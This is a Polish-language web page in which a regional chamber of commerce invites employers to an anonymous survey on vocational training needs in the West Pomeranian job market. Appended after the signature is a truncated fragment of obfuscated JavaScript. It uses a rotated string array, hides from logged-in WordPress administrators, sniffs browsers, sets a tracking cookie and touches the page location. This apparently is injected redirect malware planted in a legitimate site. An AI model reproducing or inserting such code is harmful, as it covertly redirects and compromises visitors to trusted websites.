Zaproszenie do wypełnienia ankiety | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo,

zwracamy się z prośbą o wypełnienie ankiety w badaniu dotyczącym kluczowych branż i zawodów szkolnictwa zawodowego w kontekście rozwoju zachodniopomorskiego rynku pracy.  Wypełniając anonimową ankietę mają Państwo wpływ na wyłonienie tych obszarów kształcenia branżowego, które są najbardziej adekwatne dla poszczególnych branż naszego województwa  w perspektywie najbliższych 5 lat.

Badanie jest realizowane przez Zachodniopomorskie Obserwatorium Rynku Pracy, jednostkę Wojewódzkiego Urzędu Pracy w Szczecinie.

Pragniemy zapewnić, że Państwa uczestnictwo w badaniu jest całkowicie anonimowe, odpowiedzi będą traktowane jako poufne. Wyniki badania prezentowane będą jedynie w postaci zestawień statystycznych. Wypełnienie ankiety potrwa ok. 10 minut.  

W celu wzięcia udziału w badaniu prosimy kliknąć w ->https://www.webankieta.pl/ankieta/444502/oczekiwania-zachodniopomorskich-pracodawcow-w-zakresie-kompetencji-zawodowych-absolwentow-szkol-zawodowych.html

Ankieta będzie dla Państwa dostępna do końca sierpnia br.

W razie jakichkolwiek pytań lub wątpliwości prosimy o kontakt e-mail: zorp@wup.pl; tel.: 91 42 56 179

 

Z poważaniem,

Biuro Zachodniopomorskie Obserwatorium Rynku Pracy

  'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m